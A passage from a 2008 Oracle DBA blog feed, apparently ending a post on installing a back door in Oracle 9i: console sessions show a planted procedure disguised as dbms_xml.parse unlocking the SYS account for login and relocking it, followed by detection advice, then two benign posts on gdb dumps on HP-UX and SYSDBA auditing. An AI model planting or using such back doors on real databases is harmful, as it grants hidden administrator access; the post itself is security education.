In this first example, the attacker is going to use his/her back door to unlock the SYS account and connect as the SYS user.

&lt;pre&gt;
testuser@ORA9R2&gt; execute dbms_xml.parse('unlock');

PL/SQL procedure successfully completed.

testuser@ORA9R2&gt; connect sys/padraig as sysdba
Connected.
testuser@ORA9R2&gt; show user
USER is "SYS"
testuser@ORA9R2&gt;
&lt;/pre&gt;

Now, the attacker is finished doing his/her work as the SYS user and will change the SYS password back to the original password by calling the back door again:
&lt;pre&gt;
testuser@ORA9R2&gt; execute dbms_xml.parse('lock');

PL/SQL procedure successfully completed.

testuser@ORA9R2&gt;
&lt;/pre&gt;

&lt;h2&gt;Conclusion&lt;/h2&gt;

This post showed how an attacker could exploit a known vulnerability in Oracle 9i to obtain DBA privileges and install a back door in an Oracle database. Of course, a wary DBA could detect this by auditing the &lt;code&gt;ALTER USER&lt;/code&gt; statement and checking &lt;code&gt;SYS&lt;/code&gt; owned objects periodically.
</content>
 <feedburner:origLink>http://posulliv.github.com//2008/11/25/installing-a-back-door-in-oracle-9i.html</feedburner:origLink></entry>
 
 <entry>
   <title>Generating a System State Dump on HP-UX with gdb</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/fsUOzdxNo-g/generating-a-system-state-dump-on-hp-ux-with-gdb.html" />
   <updated>2008-11-25T00:00:00-08:00</updated>
   <id>http://schacon.github.com//2008/11/25/generating-a-system-state-dump-on-hp-ux-with-gdb</id>
   <content type="html">I have previously used the gdb (GNU Debugger) to generate oracle system state dumps on Linux systems by attaching to an Oracle process. The ability to do this has been well documented by Oracle on &lt;a href="http://metalink.oracle.com/"&gt;Metalink&lt;/a&gt; (Note 121779.1) and in &lt;a href="http://el-caro.blogspot.com/search/label/systemstate%20dump"&gt;other locations&lt;/a&gt;.&lt;br&gt;

The problem with this is that it does not work on the HP-UX platform. I found this out at the wrong time when trying to generate a system state dump during a database hang!&lt;br&gt;

Apparently, the Oracle executable needs to be re-linked on the HP-UX platform to enable the gdb debugger to generate system state dumps by attaching to an Oracle process.&lt;br&gt;

You can see all the gory details in Metalink Note 273324.1. I posted it here as I thought it might prove useful for me to have this information somewhere should I forget it in the future...
</content>
 <feedburner:origLink>http://posulliv.github.com//2008/11/25/generating-a-system-state-dump-on-hp-ux-with-gdb.html</feedburner:origLink></entry>
 
 <entry>
   <title>Audting SYSDBA Users</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/Du1P_757_GM/audting-sysdba-users.html" />
   <updated>2008-11-25T00:00:00-08:00</updated>
   <id>http://schacon.github.com//2008/11/25/audting-sysdba-users</id>
   <content type="html">I recently came accross this feature in Oracle introduced in 9i where all operations performed by a user connecting as SYSDBA are logged to an OS file. I'm sure most DBA's are familiar with this feature already but I have only just been enlightened!&lt;br&gt;

To enable this feature auditing must be enabled and the &lt;code&gt;AUDIT_SYS_OPERATIONS&lt;/code&gt; parameter must be set to &lt;code&gt;TRUE&lt;/code&gt;. For example:

&lt;pre&gt;
sys@ORCLINS1&gt; ALTER SYSTEM SET AUDIT_SYS_OPERATIONS = TRUE SCOPE=SPFILE;
&lt;/pre&gt;

FALSE is the default value for this parameter. Pretty obvious from the above statement but the database must be restarted for the parameter to take affect.&lt;br&gt;

All the audit records are then written to an operating system. The location of this file is determined by the &lt;code&gt;AUDIT_FILE_DEST&lt;/code&gt; parameter.

&lt;pre&gt;
sys@ORCLINS1&gt; show parameter AUDIT_FILE_DEST
NAME TYPE VALUE
&gt;--------------  ------------------------------------------
audit_file_dest string /oracle/oracle/admin/orclpad/adump

sys@ORCLINS1&gt;
&lt;/pre&gt;

An audit file will be created for each session started by a user logging in as SYSDBA. The audit file will contain the process ID of the server session that Oracle started for the user in its file name.&lt;br&gt;

Most people are probably already familiar with this handy feature but I like to have it documented for myself somewhere so I put it here!
</content>
 <feedburner:origLink>http://posulliv.github.com//2008/11/25/audting-sysdba-users.html</feedburner:origLink></entry>
 
 
</feed>

